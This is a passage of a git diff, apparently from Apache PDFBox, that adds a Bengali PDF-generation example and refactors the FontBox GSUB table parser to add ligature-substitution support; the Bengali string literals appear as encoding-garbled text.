Palash Ray", - "+ *", - "+ */", - "+public class BengaliPdfGenerationHelloWorld", - "+{", - "+", - "+ /**", - "+ * The unicode of this is given below:", - "+ * ", - "+ *

    ",
    -                "+     * \\u0986\\u09ae\\u09bf  \\u0995\\u09cb\\u09a8 \\u09aa\\u09a5\\u09c7  \\u0995\\u09cd\\u09b7\\u09c0\\u09b0\\u09c7\\u09b0 \\u09b7\\u09a8\\u09cd\\u09a1  \\u09aa\\u09c1\\u09a4\\u09c1\\u09b2 \\u09b0\\u09c1\\u09aa\\u09cb  \\u0997\\u0999\\u09cd\\u0997\\u09be \\u098b\\u09b7\\u09bf",
    -                "+     * 
    ", - "+ * ", - "+ */", - "+ private static final String BANGLA_TEXT_1 = \"\u00e0\u00a6\u0086\u00e0\u00a6\u00ae\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a7\u008b\u00e0\u00a6\u00a8 \u00e0\u00a6\u00aa\u00e0\u00a6\u00a5\u00e0\u00a7\u0087 \u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u0080\u00e0\u00a6\u00b0\u00e0\u00a7\u0087\u00e0\u00a6\u00b0 \u00e0\u00a6\u00b2\u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u008d\u00e0\u00a6\u00ae\u00e0\u00a7\u0080 \u00e0\u00a6\u00b7\u00e0\u00a6\u00a8\u00e0\u00a7\u008d\u00e0\u00a6\u00a1 \u00e0\u00a6\u00aa\u00e0\u00a7\u0081\u00e0\u00a6\u00a4\u00e0\u00a7\u0081\u00e0\u00a6\u00b2 \u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00aa\u00e0\u00a7\u008b \u00e0\u00a6\u0097\u00e0\u00a6\u0099\u00e0\u00a7\u008d\u00e0\u00a6\u0097\u00e0\u00a6\u00be \u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf\";", - "+ private static final String BANGLA_TEXT_2 = \"\u00e0\u00a6\u00a6\u00e0\u00a7\u008d\u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00a4 \u00e0\u00a6\u0097\u00e0\u00a6\u00be\u00e0\u00a6\u00a2\u00e0\u00a6\u00bc \u00e0\u00a6\u00b6\u00e0\u00a7\u0087\u00e0\u00a6\u00af\u00e0\u00a6\u00bc\u00e0\u00a6\u00be\u00e0\u00a6\u00b2 \u00e0\u00a6\u0085\u00e0\u00a6\u00b2\u00e0\u00a6\u00b8 \u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u00b0 \u00e0\u00a6\u009c\u00e0\u00a7\u0081\u00e0\u00a6\u00a1\u00e0\u00a6\u00bc\u00e0\u00a7\u0087 \u00e0\u00a6\u009c\u00e0\u00a6\u00be\u00e0\u00a6\u00ae\u00e0\u00a7\u008d\u00e0\u00a6\u00aa \u00e0\u00a6\u00a7\u00e0\u00a7\u0081\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00a4 \u00e0\u00a6\u00b9\u00e0\u00a6\u00a0\u00e0\u00a6\u00be\u00e0\u00a7\u008e \u00e0\u00a6\u00ad\u00e0\u00a6\u00be\u00e0\u00a6\u0099\u00e0\u00a7\u0087\u00e0\u00a6\u00a8\u00e0\u00a6\u00bf \u00e0\u00a6\u00ae\u00e0\u00a7\u008c\u00e0\u00a6\u00b2\u00e0\u00a6\u00bf\u00e0\u00a6\u0095 \u00e0\u00a6\u0090\u00e0\u00a6\u00b6\u00e0\u00a6\u00bf \u00e0\u00a6\u00a6\u00e0\u00a7\u0088\";", - "+ private static final String BANGLA_TEXT_3 = \"\u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a6\u00b2\u00e0\u00a7\u008d\u00e0\u00a6\u00b2\u00e0\u00a7\u008b\u00e0\u00a6\u00b2 \u00e0\u00a6\u00ac\u00e0\u00a7\u008d\u00e0\u00a6\u00af\u00e0\u00a6\u00be\u00e0\u00a6\u00b8 \u00e0\u00a6\u00a8\u00e0\u00a6\u00bf\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00ad\u00e0\u00a7\u009f \";", - "+", - "+ static", - "+ {", - "+ if (System.getProperty(\"java.version\").startsWith(\"1.8\"))", - "+ {", - "+ System.setProperty(\"sun.java2d.cmm\", \"sun.java2d.cmm.kcms.KcmsServiceProvider\");", - "+ }", - "+ }", - "+", - "+ public static void main(String[] args) throws IOException, URISyntaxException", - "+ {", - "+ if (args.length != 1)", - "+ {", - "+ System.err.println(", - "+ \"usage: \" + BengaliPdfGenerationHelloWorld.class.getName() + \" \");", - "+ System.exit(1);", - "+ }", - "+", - "+ String filename = args[0];", - "+", - "+ System.out.println(\"The generated pdf filename is: \" + filename);", - "+", - "+ PDDocument doc = new PDDocument();", - "+ try", - "+ {", - "+", - "+ PDPage page1 = new PDPage();", - "+ doc.addPage(page1);", - "+", - "+ PDFont font = PDType0Font.load(doc, BengaliPdfGenerationHelloWorld.class", - "+ .getResourceAsStream(\"/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf\"),", - "+ true);", - "+", - "+ PDPageContentStream contents = new PDPageContentStream(doc, page1);", - "+ contents.beginText();", - "+ contents.setFont(font, 12);", - "+ contents.newLineAtOffset(10, 750);", - "+ contents.showText(BANGLA_TEXT_1);", - "+ contents.newLineAtOffset(0, -50);", - "+ contents.showText(BANGLA_TEXT_2);", - "+ contents.newLineAtOffset(0, -30);", - "+ contents.showText(BANGLA_TEXT_3);", - "+ contents.endText();", - "+", - "+ PDImageXObject pdImage = PDImageXObject", - "+ .createFromFile(BengaliPdfGenerationHelloWorld.class", - "+ .getResource(", - "+ \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", - "+ // getFile() doesn't work if there is a space in the path", - "+ .toURI().getPath(), doc);", - "+ contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", - "+ contents.close();", - "+", - "+ doc.save(filename);", - "+ }", - "+ finally", - "+ {", - "+ doc.close();", - "+ }", - "+ }", - "+", - "+}", - "diff --git a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png", - "new file mode 100644", - "index 000000000..b5aadd116", - "Binary files /dev/null and b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png differ", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "index 2b5de0109..1986d0dbd 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "@@ -21,3 +21,2 @@ import java.io.IOException;", - " import java.util.ArrayList;", - "-import java.util.Arrays;", - " import java.util.Collection;", - "@@ -33,2 +32,22 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.gsub.GlyphSubstitutionDataExtractor;", - "+import org.apache.fontbox.ttf.table.common.CoverageTable;", - "+import org.apache.fontbox.ttf.table.common.CoverageTableFormat1;", - "+import org.apache.fontbox.ttf.table.common.CoverageTableFormat2;", - "+import org.apache.fontbox.ttf.table.common.FeatureListTable;", - "+import org.apache.fontbox.ttf.table.common.FeatureRecord;", - "+import org.apache.fontbox.ttf.table.common.FeatureTable;", - "+import org.apache.fontbox.ttf.table.common.LangSysRecord;", - "+import org.apache.fontbox.ttf.table.common.LangSysTable;", - "+import org.apache.fontbox.ttf.table.common.LookupListTable;", - "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", - "+import org.apache.fontbox.ttf.table.common.LookupTable;", - "+import org.apache.fontbox.ttf.table.common.RangeRecord;", - "+import org.apache.fontbox.ttf.table.common.ScriptRecord;", - "+import org.apache.fontbox.ttf.table.common.ScriptTable;", - "+import org.apache.fontbox.ttf.table.gsub.LigatureSetTable;", - "+import org.apache.fontbox.ttf.table.gsub.LigatureTable;", - "+import org.apache.fontbox.ttf.table.gsub.LookupTypeLigatureSubstitutionSubstFormat1;", - "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat1;", - "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat2;", - "@@ -45,6 +64,6 @@ public class GlyphSubstitutionTable extends TTFTable", - "- private LinkedHashMap scriptList;", - "+ private Map scriptList;", - " // featureList and lookupList are not maps because we need to index into them", - "- private FeatureRecord[] featureList;", - "- private LookupTable[] lookupList;", - "+ private FeatureListTable featureListTable;", - "+ private LookupListTable lookupListTable;", - "@@ -55,2 +74,4 @@ public class GlyphSubstitutionTable extends TTFTable", - "+ private Map, Integer>> rawGSubData;", - "+", - " GlyphSubstitutionTable(TrueTypeFont font)", - "@@ -79,7 +100,14 @@ public class GlyphSubstitutionTable extends TTFTable", - " scriptList = readScriptList(data, start + scriptListOffset);", - "- featureList = readFeatureList(data, start + featureListOffset);", - "- lookupList = readLookupList(data, start + lookupListOffset);", - "+ featureListTable = readFeatureList(data, start + featureListOffset);", - "+ lookupListTable = readLookupList(data, start + lookupListOffset);", - "+", - "+ GlyphSubstitutionDataExtractor glyphSubstitutionDataExtractor = new GlyphSubstitutionDataExtractor();", - "+", - "+ rawGSubData = glyphSubstitutionDataExtractor", - "+ .getGsubData(scriptList, featureListTable, lookupListTable);", - "+ LOG.debug(\"rawGSubData: \" + rawGSubData);", - " }", - "- LinkedHashMap readScriptList(TTFDataStream data, long offset) throws IOException", - "+ private Map readScriptList(TTFDataStream data, long offset)", - "+ throws IOException", - " {", - "@@ -87,10 +115,9 @@ public class GlyphSubstitutionTable extends TTFTable", - " int scriptCount = data.readUnsignedShort();", - "- ScriptRecord[] scriptRecords = new ScriptRecord[scriptCount];", - "+ ScriptTable[] scriptTables= new ScriptTable[scriptCount];", - " int[] scriptOffsets = new int[scriptCount];", - "+ String[] scriptTags = new String[scriptCount];", - " for (int i = 0; i < scriptCount; i++)", - " {", - "- ScriptRecord scriptRecord = new ScriptRecord();", - "- scriptRecord.scriptTag = data.readString(4);", - "+ scriptTags[i] = data.readString(4);", - " scriptOffsets[i] = data.readUnsignedShort();", - "- scriptRecords[i] = scriptRecord;", - " }", - "@@ -98,16 +125,16 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- scriptRecords[i].scriptTable = readScriptTable(data, offset + scriptOffsets[i]);", - "+ scriptTables[i] = readScriptTable(data, offset + scriptOffsets[i]);", - " }", - "- LinkedHashMap resultScriptList = new LinkedHashMap<>(scriptCount);", - "- for (ScriptRecord scriptRecord : scriptRecords)", - "+ Map resultScriptList = new LinkedHashMap<>(scriptCount);", - "+ for (int i = 0; i < scriptCount; i++)", - " {", - "- resultScriptList.put(scriptRecord.scriptTag, scriptRecord.scriptTable);", - "+ ScriptRecord scriptRecord = new ScriptRecord(scriptTags[i], scriptTables[i]);", - "+ resultScriptList.put(scriptRecord.getScriptTag(), scriptRecord.getScriptTable());", - " }", - "- return resultScriptList;", - "+ return Collections.unmodifiableMap(resultScriptList);", - " }", - "- ScriptTable readScriptTable(TTFDataStream data, long offset) throws IOException", - "+ private ScriptTable readScriptTable(TTFDataStream data, long offset) throws IOException", - " {", - " data.seek(offset);", - "- ScriptTable scriptTable = new ScriptTable();", - " int defaultLangSys = data.readUnsignedShort();", - "@@ -115,2 +142,3 @@ public class GlyphSubstitutionTable extends TTFTable", - " LangSysRecord[] langSysRecords = new LangSysRecord[langSysCount];", - "+ String[] langSysTags = new String[langSysCount];", - " int[] langSysOffsets = new int[langSysCount];", - "@@ -118,10 +146,11 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- LangSysRecord langSysRecord = new LangSysRecord();", - "- langSysRecord.langSysTag = data.readString(4);", - "+ langSysTags[i] = data.readString(4);", - " langSysOffsets[i] = data.readUnsignedShort();", - "- langSysRecords[i] = langSysRecord;", - " }", - "+", - "+ LangSysTable defaultLangSysTable = null;", - "+", - " if (defaultLangSys != 0)", - " {", - "- scriptTable.defaultLangSysTable = readLangSysTable(data, offset + defaultLangSys);", - "+ defaultLangSysTable = readLangSysTable(data, offset + defaultLangSys);", - " }", - "@@ -129,29 +158,30 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- langSysRecords[i].langSysTable = readLangSysTable(data, offset + langSysOffsets[i]);", - "+ LangSysTable langSysTable = readLangSysTable(data, offset + langSysOffsets[i]);", - "+ langSysRecords[i] = new LangSysRecord(langSysTags[i], langSysTable);", - " }", - "- scriptTable.langSysTables = new LinkedHashMap<>(langSysCount);", - "+ Map langSysTables = new LinkedHashMap<>(langSysCount);", - " for (LangSysRecord langSysRecord : langSysRecords)", - " {", - "- scriptTable.langSysTables.put(langSysRecord.langSysTag, langSysRecord.langSysTable);", - "+ langSysTables.put(langSysRecord.getLangSysTag(),", - "+ langSysRecord.getLangSysTable());", - " }", - "- return scriptTable;", - "+ return new ScriptTable(defaultLangSysTable, Collections.unmodifiableMap(langSysTables));", - " }", - "- LangSysTable readLangSysTable(TTFDataStream data, long offset) throws IOException", - "+ private LangSysTable readLangSysTable(TTFDataStream data, long offset) throws IOException", - " {", - " data.seek(offset);", - "- LangSysTable langSysTable = new LangSysTable();", - "- @SuppressWarnings({\"unused\", \"squid:S1854\"})", - " int lookupOrder = data.readUnsignedShort();", - "- langSysTable.requiredFeatureIndex = data.readUnsignedShort();", - "+ int requiredFeatureIndex = data.readUnsignedShort();", - " int featureIndexCount = data.readUnsignedShort();", - "- langSysTable.featureIndices = new int[featureIndexCount];", - "+ int[] featureIndices = new int[featureIndexCount];", - " for (int i = 0; i < featureIndexCount; i++)", - " {", - "- langSysTable.featureIndices[i] = data.readUnsignedShort();", - "+ featureIndices[i] = data.readUnsignedShort();", - " }", - "- return langSysTable;", - "+ return new LangSysTable(lookupOrder, requiredFeatureIndex, featureIndexCount,", - "+ featureIndices);", - " }", - "- FeatureRecord[] readFeatureList(TTFDataStream data, long offset) throws IOException", - "+ private FeatureListTable readFeatureList(TTFDataStream data, long offset) throws IOException", - " {", - "@@ -161,8 +191,7 @@ public class GlyphSubstitutionTable extends TTFTable", - " int[] featureOffsets = new int[featureCount];", - "+ String[] featureTags = new String[featureCount];", - " for (int i = 0; i < featureCount; i++)", - " {", - "- FeatureRecord featureRecord = new FeatureRecord();", - "- featureRecord.featureTag = data.readString(4);", - "+ featureTags[i] = data.readString(4);", - " featureOffsets[i] = data.readUnsignedShort();", - "- featureRecords[i] = featureRecord;", - " }", - "@@ -170,23 +199,22 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- featureRecords[i].featureTable = readFeatureTable(data, offset + featureOffsets[i]);", - "+ FeatureTable featureTable = readFeatureTable(data, offset + featureOffsets[i]);", - "+ featureRecords[i] = new FeatureRecord(featureTags[i], featureTable);", - " }", - "- return featureRecords;", - "+ return new FeatureListTable(featureCount, featureRecords);", - " }", - "- FeatureTable readFeatureTable(TTFDataStream data, long offset) throws IOException", - "+ private FeatureTable readFeatureTable(TTFDataStream data, long offset) throws IOException", - " {", - " data.seek(offset);", - "- FeatureTable featureTable = new FeatureTable();", - "- @SuppressWarnings({\"unused\", \"squid:S1854\"})", - " int featureParams = data.readUnsignedShort();", - " int lookupIndexCount = data.readUnsignedShort();", - "- featureTable.lookupListIndices = new int[lookupIndexCount];", - "+ int[] lookupListIndices = new int[lookupIndexCount];", - " for (int i = 0; i < lookupIndexCount; i++)", - " {", - "- featureTable.lookupListIndices[i] = data.readUnsignedShort();", - "+ lookupListIndices[i] = data.readUnsignedShort();", - " }", - "- return featureTable;", - "+ return new FeatureTable(featureParams, lookupIndexCount, lookupListIndices);", - " }", - "- LookupTable[] readLookupList(TTFDataStream data, long offset) throws IOException", - "+ private LookupListTable readLookupList(TTFDataStream data, long offset) throws IOException", - " {", - "@@ -204,11 +232,10 @@ public class GlyphSubstitutionTable extends TTFTable", - " }", - "- return lookupTables;", - "+ return new LookupListTable(lookupCount, lookupTables);", - " }", - "- LookupTable readLookupTable(TTFDataStream data, long offset) throws IOException", - "+ private LookupTable readLookupTable(TTFDataStream data, long offset) throws IOException", - " {", - " data.seek(offset);", - "- LookupTable lookupTable = new LookupTable();", - "- lookupTable.lookupType = data.readUnsignedShort();", - "- lookupTable.lookupFlag = data.readUnsignedShort();", - "+ int lookupType = data.readUnsignedShort();", - "+ int lookupFlag = data.readUnsignedShort();", - " int subTableCount = data.readUnsignedShort();", - "@@ -219,8 +246,14 @@ public class GlyphSubstitutionTable extends TTFTable", - " }", - "- if ((lookupTable.lookupFlag & 0x0010) != 0)", - "+", - "+ int markFilteringSet;", - "+ if ((lookupFlag & 0x0010) != 0)", - "+ {", - "+ markFilteringSet = data.readUnsignedShort();", - "+ }", - "+ else", - " {", - "- lookupTable.markFilteringSet = data.readUnsignedShort();", - "+ markFilteringSet = 0;", - " }", - "- lookupTable.subTables = new LookupSubTable[subTableCount];", - "- switch (lookupTable.lookupType)", - "+ LookupSubTable[] subTables = new LookupSubTable[subTableCount];", - "+ switch (lookupType)", - " {", - "@@ -229,3 +262,10 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- lookupTable.subTables[i] = readLookupSubTable(data, offset + subTableOffets[i]);", - "+ subTables[i] = readLookupSubTable(data, offset + subTableOffets[i]);", - "+ }", - "+ break;", - "+ case 4: // Ligature Substitution Subtable", - "+ for (int i = 0; i < subTableCount; i++)", - "+ {", - "+ subTables[i] = readLigatureSubstitutionSubtable(data,", - "+ offset + subTableOffets[i]);", - " }", - "@@ -234,8 +274,9 @@ public class GlyphSubstitutionTable extends TTFTable", - " // Other lookup types are not supported", - "- LOG.debug(\"Type \" + lookupTable.lookupType + \" GSUB lookup table is not supported and will be ignored\");", - "+ LOG.debug(\"Type \" + lookupType", - "+ + \" GSUB lookup table is not supported and will be ignored\");", - " }", - "- return lookupTable;", - "+ return new LookupTable(lookupType, lookupFlag, markFilteringSet, subTables);", - " }", - "- LookupSubTable readLookupSubTable(TTFDataStream data, long offset) throws IOException", - "+ private LookupSubTable readLookupSubTable(TTFDataStream data, long offset) throws IOException", - " {", - "@@ -247,8 +288,6 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- LookupTypeSingleSubstFormat1 lookupSubTable = new LookupTypeSingleSubstFormat1();", - "- lookupSubTable.substFormat = substFormat;", - " int coverageOffset = data.readUnsignedShort();", - "- lookupSubTable.deltaGlyphID = data.readSignedShort();", - "- lookupSubTable.coverageTable = readCoverageTable(data, offset + coverageOffset);", - "- return lookupSubTable;", - "+ short deltaGlyphID = data.readSignedShort();", - "+ CoverageTable coverageTable = readCoverageTable(data, offset + coverageOffset);", - "+ return new LookupTypeSingleSubstFormat1(substFormat, coverageTable, deltaGlyphID);", - " }", - "@@ -256,13 +295,11 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- LookupTypeSingleSubstFormat2 lookupSubTable = new LookupTypeSingleSubstFormat2();", - "- lookupSubTable.substFormat = substFormat;", - " int coverageOffset = data.readUnsignedShort();", - " int glyphCount = data.readUnsignedShort();", - "- lookupSubTable.substituteGlyphIDs = new int[glyphCount];", - "+ int[] substituteGlyphIDs = new int[glyphCount];", - " for (int i = 0; i < glyphCount; i++)", - " {", - "- lookupSubTable.substituteGlyphIDs[i] = data.readUnsignedShort();", - "+ substituteGlyphIDs[i] = data.readUnsignedShort();", - " }", - "- lookupSubTable.coverageTable = readCoverageTable(data, offset + coverageOffset);", - "- return lookupSubTable;", - "+ CoverageTable coverageTable = readCoverageTable(data, offset + coverageOffset);", - "+ return new LookupTypeSingleSubstFormat2(substFormat, coverageTable, substituteGlyphIDs);", - " }", - "@@ -273,3 +310,96 @@ public class GlyphSubstitutionTable extends TTFTable", - "- CoverageTable readCoverageTable(TTFDataStream data, long offset) throws IOException", - "+ private LookupSubTable readLigatureSubstitutionSubtable(TTFDataStream data, long offset)", - "+ throws IOException", - "+ {", - "+ data.seek(offset);", - "+ int substFormat = data.readUnsignedShort();", - "+", - "+ if (substFormat != 1)", - "+ {", - "+ throw new IllegalArgumentException(", - "+ \"The expected SubstFormat for LigatureSubstitutionTable is 1\");", - "+ }", - "+", - "+ int coverage = data.readUnsignedShort();", - "+ int ligSetCount = data.readUnsignedShort();", - "+", - "+ int[] ligatureOffsets = new int[ligSetCount];", - "+", - "+ for (int i = 0; i < ligSetCount; i++)", - "+ {", - "+ ligatureOffsets[i] = data.readUnsignedShort();", - "+ }", - "+", - "+ CoverageTable coverageTable = readCoverageTable(data, offset + coverage);", - "+", - "+ if (ligSetCount != coverageTable.getSize())", - "+ {", - "+ throw new IllegalArgumentException(", - "+ \"According to the OpenTypeFont specifications, the coverage count should be equal to the no. of LigatureSetTables\");", - "+ }", - "+", - "+ LigatureSetTable[] ligatureSetTables = new LigatureSetTable[ligSetCount];", - "+", - "+ for (int i = 0; i < ligSetCount; i++)", - "+ {", - "+", - "+ int coverageGlyphId = coverageTable.getGlyphId(i);", - "+", - "+ ligatureSetTables[i] = readLigatureSetTable(data,", - "+ offset + ligatureOffsets[i], coverageGlyphId);", - "+ }", - "+", - "+ return new LookupTypeLigatureSubstitutionSubstFormat1(substFormat, coverageTable,", - "+ ligatureSetTables);", - "+ }", - "+", - "+ private LigatureSetTable readLigatureSetTable(TTFDataStream data, long ligatureSetTableLocation,", - "+ int coverageGlyphId) throws IOException", - "+ {", - "+ data.seek(ligatureSetTableLocation);", - "+", - "+ int ligatureCount = data.readUnsignedShort();", - "+ LOG.debug(\"ligatureCount=\" + ligatureCount);", - "+", - "+ int[] ligatureOffsets = new int[ligatureCount];", - "+ LigatureTable[] ligatureTables = new LigatureTable[ligatureCount];", - "+", - "+ for (int i = 0; i < ligatureOffsets.length; i++)", - "+ {", - "+ ligatureOffsets[i] = data.readUnsignedShort();", - "+ }", - "+", - "+ for (int i = 0; i < ligatureOffsets.length; i++)", - "+ {", - "+ int ligatureOffset = ligatureOffsets[i];", - "+ ligatureTables[i] = readLigatureTable(data,", - "+ ligatureSetTableLocation + ligatureOffset, coverageGlyphId);", - "+ }", - "+", - "+ return new LigatureSetTable(ligatureCount, ligatureTables);", - "+ }", - "+", - "+ private LigatureTable readLigatureTable(TTFDataStream data, long ligatureTableLocation,", - "+ int coverageGlyphId) throws IOException", - "+ {", - "+ data.seek(ligatureTableLocation);", - "+", - "+ int ligatureGlyph = data.readUnsignedShort();", - "+", - "+ int componentCount = data.readUnsignedShort();", - "+", - "+ int[] componentGlyphIDs = new int[componentCount];", - "+", - "+ componentGlyphIDs[0] = coverageGlyphId;", - "+", - "+ for (int i = 1; i <= componentCount - 1; i++)", - "+ {", - "+ componentGlyphIDs[i] = data.readUnsignedShort();", - "+ }", - "+", - "+ return new LigatureTable(ligatureGlyph, componentCount, componentGlyphIDs);", - "+", - "+ }", - "+", - "+ private CoverageTable readCoverageTable(TTFDataStream data, long offset) throws IOException", - " {", - "@@ -281,11 +411,9 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- CoverageTableFormat1 coverageTable = new CoverageTableFormat1();", - "- coverageTable.coverageFormat = coverageFormat;", - " int glyphCount = data.readUnsignedShort();", - "- coverageTable.glyphArray = new int[glyphCount];", - "+ int[] glyphArray = new int[glyphCount];", - " for (int i = 0; i < glyphCount; i++)", - " {", - "- coverageTable.glyphArray[i] = data.readUnsignedShort();", - "+ glyphArray[i] = data.readUnsignedShort();", - " }", - "- return coverageTable;", - "+ return new CoverageTableFormat1(coverageFormat, glyphArray);", - " }", - "@@ -293,12 +421,12 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- CoverageTableFormat2 coverageTable = new CoverageTableFormat2();", - "- coverageTable.coverageFormat = coverageFormat;", - " int rangeCount = data.readUnsignedShort();", - "- coverageTable.rangeRecords = new RangeRecord[rangeCount];", - "+ RangeRecord[] rangeRecords = new RangeRecord[rangeCount];", - "+", - "+", - " for (int i = 0; i < rangeCount; i++)", - " {", - "- coverageTable.rangeRecords[i] = readRangeRecord(data);", - "+ rangeRecords[i] = readRangeRecord(data);", - " }", - "- return coverageTable;", - "+ return new CoverageTableFormat2(coverageFormat, rangeRecords);", - " }", - "@@ -310,6 +438,5 @@ public class GlyphSubstitutionTable extends TTFTable", - "-", - " /**", - "- * Choose from one of the supplied OpenType script tags, depending on what the font supports and", - "- * potentially on context.", - "+ * Choose from one of the supplied OpenType script tags, depending on what the font supports and potentially on", - "+ * context.", - " *", - "@@ -356,5 +483,5 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- if (scriptTable.defaultLangSysTable == null)", - "+ if (scriptTable.getDefaultLangSysTable() == null)", - " {", - "- result = scriptTable.langSysTables.values();", - "+ result = scriptTable.getLangSysTables().values();", - " }", - "@@ -362,4 +489,4 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- result = new ArrayList<>(scriptTable.langSysTables.values());", - "- result.add(scriptTable.defaultLangSysTable);", - "+ result = new ArrayList<>(scriptTable.getLangSysTables().values());", - "+ result.add(scriptTable.getDefaultLangSysTable());", - " }", - "@@ -392,13 +519,14 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- int required = langSysTable.requiredFeatureIndex;", - "+ int required = langSysTable.getRequiredFeatureIndex();", - " if (required != 0xffff) // if no required features = 0xFFFF", - " {", - "- result.add(featureList[required]);", - "+ result.add(featureListTable.getFeatureRecords()[required]);", - " }", - "- for (int featureIndex : langSysTable.featureIndices)", - "+ for (int featureIndex : langSysTable.getFeatureIndices())", - " {", - " if (enabledFeatures == null", - "- || enabledFeatures.contains(featureList[featureIndex].featureTag))", - "+ || enabledFeatures.contains(", - "+ featureListTable.getFeatureRecords()[featureIndex].getFeatureTag()))", - " {", - "- result.add(featureList[featureIndex]);", - "+ result.add(featureListTable.getFeatureRecords()[featureIndex]);", - " }", - "@@ -421,4 +549,4 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- return Integer.compare(enabledFeatures.indexOf(o1.featureTag),", - "- enabledFeatures.indexOf(o2.featureTag));", - "+ return Integer.compare(enabledFeatures.indexOf(o1.getFeatureTag()),", - "+ enabledFeatures.indexOf(o2.getFeatureTag()));", - " }", - "@@ -434,3 +562,3 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- if (featureRecord.featureTag.equals(featureTag))", - "+ if (featureRecord.getFeatureTag().equals(featureTag))", - " {", - "@@ -447,3 +575,3 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- if (iter.next().featureTag.equals(featureTag))", - "+ if (iter.next().getFeatureTag().equals(featureTag))", - " {", - "@@ -457,9 +585,10 @@ public class GlyphSubstitutionTable extends TTFTable", - " int lookupResult = gid;", - "- for (int lookupListIndex : featureRecord.featureTable.lookupListIndices)", - "+ for (int lookupListIndex : featureRecord.getFeatureTable().getLookupListIndices())", - " {", - "- LookupTable lookupTable = lookupList[lookupListIndex];", - "- if (lookupTable.lookupType != 1)", - "+ LookupTable lookupTable = lookupListTable.getLookups()[lookupListIndex];", - "+ if (lookupTable.getLookupType() != 1)", - " {", - "- LOG.debug(\"Skipping GSUB feature '\" + featureRecord.featureTag", - "- + \"' because it requires unsupported lookup table type \" + lookupTable.lookupType);", - "+ LOG.debug(\"Skipping GSUB feature '\" + featureRecord.getFeatureTag()", - "+ + \"' because it requires unsupported lookup table type \"", - "+ + lookupTable.getLookupType());", - " continue;", - "@@ -473,5 +602,5 @@ public class GlyphSubstitutionTable extends TTFTable", - " {", - "- for (LookupSubTable lookupSubtable : lookupTable.subTables)", - "+ for (LookupSubTable lookupSubtable : lookupTable.getSubTables())", - " {", - "- int coverageIndex = lookupSubtable.coverageTable.getCoverageIndex(gid);", - "+ int coverageIndex = lookupSubtable.getCoverageTable().getCoverageIndex(gid);", - " if (coverageIndex >= 0)", - "@@ -544,208 +673,15 @@ public class GlyphSubstitutionTable extends TTFTable", - "- RangeRecord readRangeRecord(TTFDataStream data) throws IOException", - "- {", - "- RangeRecord rangeRecord = new RangeRecord();", - "- rangeRecord.startGlyphID = data.readUnsignedShort();", - "- rangeRecord.endGlyphID = data.readUnsignedShort();", - "- rangeRecord.startCoverageIndex = data.readUnsignedShort();", - "- return rangeRecord;", - "- }", - "-", - "- static class ScriptRecord", - "- {", - "- // https://www.microsoft.com/typography/otspec/scripttags.htm", - "- String scriptTag;", - "- ScriptTable scriptTable;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"ScriptRecord[scriptTag=%s]\", scriptTag);", - "- }", - "- }", - "-", - "- static class ScriptTable", - "+ public Map, Integer>> getRawGSubData()", - " {", - "- LangSysTable defaultLangSysTable;", - "- LinkedHashMap langSysTables;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"ScriptTable[hasDefault=%s,langSysRecordsCount=%d]\",", - "- defaultLangSysTable != null, langSysTables.size());", - "- }", - "+ return rawGSubData;", - " }", - "- static class LangSysRecord", - "+ private RangeRecord readRangeRecord(TTFDataStream data) throws IOException", - " {", - "- // https://www.microsoft.com/typography/otspec/languagetags.htm", - "- String langSysTag;", - "- LangSysTable langSysTable;", - "-", - "- @Override", - "- public String toString()", - "- {", - "- return String.format(\"LangSysRecord[langSysTag=%s]\", langSysTag);", - "- }", - "+ int startGlyphID = data.readUnsignedShort();", - "+ int endGlyphID = data.readUnsignedShort();", - "+ int startCoverageIndex = data.readUnsignedShort();", - "+ return new RangeRecord(startGlyphID, endGlyphID, startCoverageIndex);", - " }", 